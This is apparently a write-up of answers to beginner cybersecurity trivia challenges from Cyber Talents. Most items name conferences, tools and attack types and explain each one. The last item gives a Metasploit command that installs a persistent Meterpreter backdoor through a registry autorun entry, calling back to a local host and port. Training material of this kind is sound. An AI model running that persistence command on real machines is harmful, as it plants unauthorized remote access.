Cyber Talents | General Information Challenges

2- Challenge Name: Hackers Gathering

Challenge Description:

I am a cybersecurity conference that runs in August every year in Las Vegas. I am the largest gathering for hackers in the whole world. No credit cards, no online booking, only cash allowed. Who am I?

Answer: Defcon

Details:
Defcon is renowned for being the world’s largest and most notable hacker convention, held annually in Las Vegas. Known for its strict cash-only policy to maintain attendee anonymity, it attracts a diverse audience, from professionals to enthusiasts, offering talks, workshops, and competitions related to hacking and cybersecurity.

3- Challenge Name: Founder

Challenge Description:

I have founded two of the most famous cybersecurity conferences across the globe in Las Vegas, USA. I am not The Dark Knight. I am The DarK — — — — ?

Answer: tangent

Details:
Jeff Moss, known by his handle “Dark Tangent,” is the founder of both Defcon and Black Hat, two premier cybersecurity conferences. Defcon focuses on the hacker community, while Black Hat is more oriented towards industry professionals, offering advanced training and briefings on the latest in information security.

4- Challenge Name: Back to History

Challenge Description:

I am the first computer virus ever known. You will find me in your head. My name is ……..?

Answer: Brain

Details:
The Brain virus, created in 1986, is considered the first computer virus. Originating from Pakistan, it targeted IBM PC systems and was spread through floppy disks. The virus creators, Basit and Amjad Farooq Alvi, designed it to protect their medical software from piracy.

5- Challenge Name: Contribute

Challenge Description:

I am an organization that releases the Top 10 vulnerabilities in application security. I am ……?

Answer: owasp

Details:
The Open Web Application Security Project (OWASP) is a nonprofit organization dedicated to improving the security of software. They provide resources such as the OWASP Top 10, which highlights the most critical security risks to web applications, offering guidance for developers and security professionals to mitigate these risks.

6- Challenge Name: Greeks

Challenge Description:

The art of hiding messages or information inside other images, text, or data.

Answer: Steganography

Details:
Steganography is the practice of concealing messages or information within other non-suspicious files or data. Unlike encryption, which obscures the content, steganography hides the existence of the message itself, making it an effective tool for covert communication.

7- Challenge Name: Robot

Challenge Description:

A group or network of machines that are controlled by an attacker to do a certain task.

Answer: bot

Details:
A bot, short for robot, is a program that performs automated tasks. In cybersecurity, bots can be part of a botnet, a network of infected devices controlled by an attacker to execute tasks like DDoS attacks, spamming, or data theft without the users’ knowledge.

8- Challenge Name: Japanese Warrior

Challenge Description:

I am a Linux distribution with two versions, one for web penetration testing and the other for attacking smart grids. What is my smart grid distribution name?

Answer: SamuraiSTFU

Details:
SamuraiSTFU (Smart Threat Functional Utility) is a specialized Linux distribution designed for security professionals focusing on testing smart grid infrastructures. It complements SamuraiWTF (Web Testing Framework), which is aimed at web penetration testing, offering tools for a broad range of cybersecurity assessments.

9- Challenge Name: Close Look

Challenge Description:

I am a Linux distribution that has many tricks to do packet and traffic analysis. Who am I?

Answer: packetrix

Details:
Packetrix is a Linux distribution tailored for network security, specializing in packet and traffic analysis. It equips security professionals with tools to monitor, capture, and analyze network traffic, helping to identify vulnerabilities and ensure network integrity.

10- Challenge Name: Pay Me

Challenge Description:

I will lock your machine screen or files till you pay me. Who am I?

Answer: ransomware

Details:
Ransomware is a type of malicious software designed to block access to a computer system or data until a ransom is paid. It can encrypt files or lock the screen, with attackers demanding payment, often in cryptocurrency, to restore access.

11- Challenge Name: TrendMicro Conference

Challenge Description:

Periodic conference in many cities hosted by Trend Micro.

Answer: cloudsec

Details:
CloudSec is a conference series organized by Trend Micro, focusing on cloud security. It gathers industry experts to discuss the latest trends, threats, and solutions in cloud security, providing a platform for networking and knowledge sharing.

12- Challenge Name: Intercept

Challenge Description:

The attacker intercepts information between the receiver and sender. What is the attack name?

Answer: mitm

Details:
A Man-in-the-Middle (MITM) attack involves an attacker secretly intercepting and possibly altering the communication between two parties who believe they are directly communicating with each other. This attack can compromise sensitive information and is a significant threat in cybersecurity.

13- Challenge Name: Modify Code

Challenge Description:

Change code from one form to another to prevent attackers from understanding it.

Answer: Obfuscation

Details:
Obfuscation is a technique used to make code difficult to understand or analyze by altering its structure without changing its functionality. This method is used to protect intellectual property and hinder reverse engineering by malicious actors.

14- Challenge Name: Do you trust senders

Challenge Description:

Receive malware from a known person. What is the attack type?

Answer: spoofing

Details:
Spoofing is a type of attack where a malicious actor disguises themselves as a trusted entity to trick victims into taking harmful actions, such as downloading malware. Email spoofing is a common form where attackers send emails from seemingly legitimate sources.

15- Challenge Name: My box

Challenge Description:

I am a professional pen tester. I do not need to know any information from the customer, I do ….box pen test.

Answer: black

Details:
Black box testing refers to a penetration testing approach where the tester has no prior knowledge of the system being tested. This method simulates an external attack and helps identify vulnerabilities that could be exploited by an outsider.

16- Challenge Name: Crash

Challenge Description:

Enter a lot of random trash till the application crashes.

Answer: fuzzing

Details:
Fuzzing is a testing technique used to discover security vulnerabilities by inputting large amounts of random data (fuzz) into a program to see if it causes unexpected behavior, such as crashes or memory leaks.

This helps identify potential weaknesses in software.

17- Challenge Name: Scan

Challenge Description:

One of the famous, free port scanners. Who am I?

Answer: nmap

Details:
Nmap (Network Mapper) is a widely used open-source tool for network discovery and security auditing. It helps in identifying hosts and services on a network, enabling administrators to map their networks and detect vulnerabilities.

18- Challenge Name: Capture

Challenge Description:

Network analysis tool used to capture packets and present it in readable format.

Answer: wireshark

Details:
Wireshark is a powerful network protocol analyzer used to capture and interactively browse the traffic running on a computer network. It provides detailed information about network protocols, helping in diagnosing network issues and investigating security incidents.

19- Challenge Name: Precious Vulnerability

Challenge Description:

A security flaw that is not yet known.

Answer: zeroday

Details:
A zero-day vulnerability refers to a security flaw that is unknown to the software vendor and has no available patch. Attackers exploit these vulnerabilities before developers have a chance to address them, making zero-day attacks highly dangerous.

20- Challenge Name: SCADA

Challenge Description:

A worm that targeted SCADA Systems.

Answer: stuxnet

Details:
Stuxnet is a notorious computer worm discovered in 2010, specifically designed to target Supervisory Control and Data Acquisition (SCADA) systems. It is believed to have been created to disrupt Iran’s nuclear program by causing physical damage to its centrifuges.

21- Challenge Name: htmlentities

Challenge Description:

True or False, htmlentities (convert special characters to their HTML entity) can’t be exploited to run XSS payload?

Answer: false

Details:
The statement is false. Although htmlentities() helps prevent XSS (Cross-Site Scripting) by converting special characters to their HTML entities, improper implementation or incomplete encoding can still leave applications vulnerable to XSS attacks.

22- Challenge Name: Encoding

Challenge Description:

What type of encoding is used for this text: “aGVsbG93b3JsZDEx”?

Answer: Base64

Details:
The provided text is encoded using Base64, a binary-to-text encoding scheme that translates binary data into an ASCII string format. Base64 is commonly used in various applications, including email via MIME and storing complex data in XML or JSON.

23- Challenge Name: Reward

Challenge Description:

I receive a reward or mention on a wall of fame when I find a vulnerability. I am participating in ….. program? Format of Flag (Do not use spaces)

Answer: bugbounty

Details:
Bug bounty programs incentivize security researchers to find and report vulnerabilities in software by offering rewards or public recognition. Many organizations run these programs to improve their security posture by leveraging the wider security community.

24- Challenge Name: Hide me

Challenge Description:

I act as a middleman to forward requests from different devices to access external resources. I am a ……?

Answer: proxy

Details:
A proxy server acts as an intermediary between clients and other servers, forwarding requests and responses. Proxies can be used for various purposes, including anonymity, content filtering, and performance improvement.

25- Challenge Name: Cash

Challenge Description:

I am a type of attack used to spread malware. I push data in the cache records of your DNS. I am cache ……..?

Answer: poisoning

Details:
Cache poisoning, also known as DNS poisoning, is an attack where incorrect DNS data is inserted into the cache of a DNS resolver. This causes users to be redirected to malicious sites without their knowledge, facilitating phishing, malware distribution, and other attacks.

26- Challenge Name: User Name

Challenge Description:

He is a username or account that by default has access to all commands and files on a Linux or other Unix-like operating system.

Answer: root

Details:
The root account is the superuser on Unix and Linux systems, with unrestricted access to all commands and files. It is used for system administration tasks and is critical for managing and configuring the system.

27- Challenge Name: Crime Scene

Challenge Description:

Process of analyzing and investigating computer devices, on suspecting that such devices may have been used in a cybercrime.

Flag Format: XXXXXXXXX

Answer: Forensics

Details:
Digital forensics involves the process of collecting, preserving, analyzing, and presenting digital evidence in a manner suitable for legal proceedings. It is crucial for investigating cybercrimes and can involve analyzing computers, mobile devices, and networks.

28- Challenge Name: CVE Number

Challenge Description:

What is the CVE ID that is related to EternalBlue.

Flag Format: XXX-XXXX-XXXX

Answer: CVE-2017-0144

Details:
CVE-2017–0144 refers to the vulnerability exploited by EternalBlue, a cyberattack exploit developed by the NSA and later leaked by the Shadow Brokers. It targets a vulnerability in Microsoft’s SMB protocol and was notably used in the WannaCry ransomware attack.

29- Challenge Name: One Click

Challenge Description:

Type of malicious exploit of a website where unauthorized commands are submitted from a user that the web application trusts.

Answer: CSRF

Details:
Cross-Site Request Forgery (CSRF) is an attack that tricks a user into performing actions on a web application without their consent. By exploiting the user’s authenticated session, attackers can execute unwanted actions on behalf of the user.

30- Challenge Name: S3cret

Challenge Description:

I need to remove a file called s3cret in my home directory. Which command should I use?

Answer: rm ~/s3cret

Details:
The command `rm ~/s3cret` is used to remove a file named “s3cret” located in the home directory of the current user. `rm` is the Unix command for removing files, and `~` is a shorthand for the user’s home directory.

31- Challenge Name: Distribution

Challenge Description:

Debian-based distribution with a collection of security and forensics tools. It features timely security updates, support for the ARM architecture.

The flag without spaces.

Answer: kalilinux

Details:
Kali Linux is a Debian-based distribution specifically designed for digital forensics and penetration testing. It includes a comprehensive collection of security tools and is regularly updated to provide the latest in security capabilities.

32- Challenge Name: Security Model

Challenge Description:

It is a model designed to guide policies for information security within an organization.

Answer: CIA

Details:
The CIA triad stands for Confidentiality, Integrity, and Availability. It is a foundational model in information security, guiding policies and practices to ensure data is protected from unauthorized access (Confidentiality), remains accurate and unaltered (Integrity), and is accessible to authorized users when needed (Availability).

33- Challenge Name: JPG Magic

Challenge Description:

You are doing some file analysis and you need to verify the magic byte of JPEG image.

Do you know the first 2 bytes of JPEG format?

Flag format: XX XX

Answer: ff d8

Details:
The magic bytes for a JPEG image are `ff d8`, which signify the start of the image file. These bytes are used to identify the file format and are crucial in file type verification and analysis.

34- Challenge Name: Silent Look

Challenge Description:

Gathering as much information as possible without establishing contact between the pen tester and the target which you are collecting information.

Flag Format: XXXXXXX XXXXXXXXXXX XXXXXXXXX

Answer: passive information gathering

Details:
Passive information gathering involves collecting data about a target without directly interacting with it. Techniques include open-source intelligence (OSINT), public records searches, and other methods that do not alert the target to the investigation.

35- Challenge Name: Persistence

Challenge Description:

You want to achieve persistence using Meterpreter’s persistence module by creating an autorun registry file and getting a shell automatically every time the user restarts the PC.

Persistence options:
– Minutes after restarting the system: 7
– Your Local port: 1337
– Your local host IP: 192.168.0.177

Flag format is: xxx xxxxxxx/xxxxxxx/xxxxx/xxxxxxxx_xxxxxxxxxxx xxxxx_xxxx=xxx xxxxx=xxxx xxxxx=xxx.xxx.x.xxx

Answer: run exploit/windows/local/registry_persistence SLEEP_TIME=420 LPORT=1337 LHOST=192.168.0.177

Details:
This command sets up a persistent Meterpreter backdoor on a Windows system. By creating an autorun registry entry, it ensures that a shell is obtained every time the system restarts. The specific parameters set the delay to 7 minutes, and define the local port and IP address for the connection.